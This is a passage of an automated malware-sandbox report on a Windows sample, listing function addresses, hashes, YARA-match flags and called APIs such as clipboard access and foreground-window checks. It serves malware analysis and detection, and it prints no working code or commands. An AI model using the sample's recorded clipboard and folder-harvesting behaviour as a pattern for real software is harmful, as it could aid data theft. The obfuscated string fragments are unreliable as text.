                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                                                                                                                                                                                                                                                        • API String ID: 0-2463461626
                                                                                                                                                                                                                                                                        • Opcode ID: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
                                                                                                                                                                                                                                                                        • Instruction ID: 9da5d6d296f3bfee901d0d77cc5a16e87a8dcfd3bf90c75fd7b80ece23d6fa7e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3D1477264D7549BC324CF28C8516ABBBE2EFC1304F1D896DE4D58B385D639C94ACB82
                                                                                                                                                                                                                                                                        Function 0040A780 Relevance: 9.2, Strings: 7, Instructions: 442COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                                                                                                                                                                                                                                                        • API String ID: 0-2463461626
                                                                                                                                                                                                                                                                        • Opcode ID: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                                                                                                                                                                                                                                                        • Instruction ID: 1dd51b58cbaf6b0a0f55c15d87e18128fba8370b8dc8b23ccf2a832bc891c079
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29D1497665C3548BD324CF2488516ABBBE2EBC1304F1D897EE4D69B381D638C916CB87
                                                                                                                                                                                                                                                                        Function 004329C0 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                                                                        • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                                                                                                                                                        • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                                                                                                                                                                                                                                                        Function 007191B7 Relevance: 9.0, Strings: 7, Instructions: 223COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                                                                                                                                                                                                        • API String ID: 0-2309992716
                                                                                                                                                                                                                                                                        • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                        • Instruction ID: 8572baf30d401bcb74ca6cad787bf5c623c23a3ebd3a496303d547362f6a391e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0361186154C3C69AD3118F3988A07AAFFE09FA3310F18496DE5D18B3D2D379CA4AD716
                                                                                                                                                                                                                                                                        Function 00408F50 Relevance: 9.0, Strings: 7, Instructions: 223COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                                                                                                                                                                                                        • API String ID: 0-2309992716
                                                                                                                                                                                                                                                                        • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                        • Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A
                                                                                                                                                                                                                                                                        Function 007197E7 Relevance: 7.9, Strings: 6, Instructions: 442COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: #4<7$+8=>$PK$Tiec$\$r
                                                                                                                                                                                                                                                                        • API String ID: 0-1906979145
                                                                                                                                                                                                                                                                        • Opcode ID: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
                                                                                                                                                                                                                                                                        • Instruction ID: de92fa5aec5632ffffafdb5cc8ea92f235cefcfbc222fb895bddfebf8e38eaba
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BED13676A0C3409BD318CF39C8516ABBBE1EFD1318F18892DE5D69B291D738C946CB46
                                                                                                                                                                                                                                                                        Function 00409580 Relevance: 7.9, Strings: 6, Instructions: 442COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: #4<7$+8=>$PK$Tiec$\$r
                                                                                                                                                                                                                                                                        • API String ID: 0-1906979145
                                                                                                                                                                                                                                                                        • Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                                                                                                                                                                                                        • Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46
                                                                                                                                                                                                                                                                        Function 00718AB7 Relevance: 7.7, APIs: 5, Instructions: 194threadCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00718B83
                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00718B8C
                                                                                                                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00718C42
                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00718C9A
                                                                                                                                                                                                                                                                          • Part of subcall function 0071C7B7: CoInitializeEx.COMBASE(00000000,00000002), ref: 0071C7CA
                                                                                                                                                                                                                                                                          • Part of subcall function 0071B5F7: FreeLibrary.KERNEL32(00718D1F), ref: 0071B5FD
                                                                                                                                                                                                                                                                          • Part of subcall function 0071B5F7: FreeLibrary.KERNEL32 ref: 0071B61E
                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00718D38
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3072701918-0
                                                                                                                                                                                                                                                                        • Opcode ID: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
                                                                                                                                                                                                                                                                        • Instruction ID: f1281dcf56ff8a275773f915b585066618728d2f759f2a525ab78855cb105386
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC5187B7F102180BD72CAEBDCC5A79975878BC9710F1E813D5945DB3D5EEB8880142D5
                                                                                                                                                                                                                                                                        Function 00427603 Relevance: 7.0, Strings: 5, Instructions: 702COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: )G+I$+K M$B~B$|B$s0u
                                                                                                                                                                                                                                                                        • API String ID: 0-2670551875
                                                                                                                                                                                                                                                                        • Opcode ID: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
                                                                                                                                                                                                                                                                        • Instruction ID: a4cd9e1bca78e5d66c5ba9b7c65c08060f0057a840f0996e05fe944024406416
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C321175A08350CFD714CF28E85072EBBE2BF8A314F194A7DE89957392D7349805CB9A
                                                                                                                                                                                                                                                                        Function 0072CE63 Relevance: 6.5, Strings: 5, Instructions: 273COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: KT$Q$SV$p8`;$xy
                                                                                                                                                                                                                                                                        • API String ID: 0-2575762000
                                                                                                                                                                                                                                                                        • Opcode ID: 8208a9a5f85f4d31079f5f33de460df7d971af99579cab6366320c8ef0c9cde7
                                                                                                                                                                                                                                                                        • Instruction ID: 2255386f7330721b46ffdaf9979a2c90c406480ae86533e286d75d07a12c338b
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8208a9a5f85f4d31079f5f33de460df7d971af99579cab6366320c8ef0c9cde7
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9191FDB6A0C3549FD304DF56C84155FBBE2FFD5300F19896DE8C88B201EA35CA098B86
                                                                                                                                                                                                                                                                        Function 0072EA27 Relevance: 5.8, Strings: 4, Instructions: 779COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: "$-+$/$hI
                                                                                                                                                                                                                                                                        • API String ID: 0-2772680581
                                                                                                                                                                                                                                                                        • Opcode ID: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
                                                                                                                                                                                                                                                                        • Instruction ID: 80d069b9c3f3d42f340efb712ce7a676898f315fcf49a6f22f048e3d8e646fd9
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F42257050C3A58FD721CF24D850A6EBBF1AF92314F188A7CE8E95B392D7398905CB56
                                                                                                                                                                                                                                                                        Function 0041E7C0 Relevance: 5.8, Strings: 4, Instructions: 779COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: "$-+$/$hI
                                                                                                                                                                                                                                                                        • API String ID: 0-2772680581
                                                                                                                                                                                                                                                                        • Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                                                                                                                                                                                                                                        • Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A
                                                                                                                                                                                                                                                                        Function 0072D230 Relevance: 5.3, Strings: 4, Instructions: 318COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 0u4w$_q$qr$xy
                                                                                                                                                                                                                                                                        • API String ID: 0-1225007230
                                                                                                                                                                                                                                                                        • Opcode ID: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
                                                                                                                                                                                                                                                                        • Instruction ID: 8a956b4729cc2ed0a704aa9d49c2eaac9927c55bdcb23dd613342eb78b2278eb
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A91E3B1908321CBC724DF58D89276BB7F1EF95324F18992CE8CA8B291E3789905C756
                                                                                                                                                                                                                                                                        Function 0073CCB0 Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                                        • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                                                                                                                                                                                        • Instruction ID: d6b77cf9d590a59c4c03379e5e0a3c085cb03c82df5bfb0130d71a64ef4d19c1
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83914972A0C3D08BE3358B3984517ABBBD29FE2314F19896DD4D99B382CB794805CB52
                                                                                                                                                                                                                                                                        Function 0042CA49 Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                                        • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                                                                                                                                                                                        • Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                                                                                                                                                                                                        Function 0073CD89 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                                        • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                                        • Instruction ID: a44ee82977ab86a89107c33ed5e1b14e8f94d486a46a9f339a0777750f58c7cd
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6915972A0C3D08BF3358B3984517ABBBD29FE3314F19896DD4D99B782CA794805CB52
                                                                                                                                                                                                                                                                        Function 0042CB22 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                                        • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                                        • Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96
                                                                                                                                                                                                                                                                        Function 0073CD37 Relevance: 5.3, Strings: 4, Instructions: 295COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                                        • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                                        • Instruction ID: efb53fa5210bded6e299c2b347daee56f339b49cc48e6e1cf003f2b934225389
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30916C72A083D08BE3358B3984517ABBBD29FE3314F19896DD4D99B682C7794805CB52
                                                                                                                                                                                                                                                                        Function 0042CAD0 Relevance: 5.3, Strings: 4, Instructions: 295COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                                        • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                                        • Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                                                                                                                                                                                                        Function 0073CD78 Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                                        • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
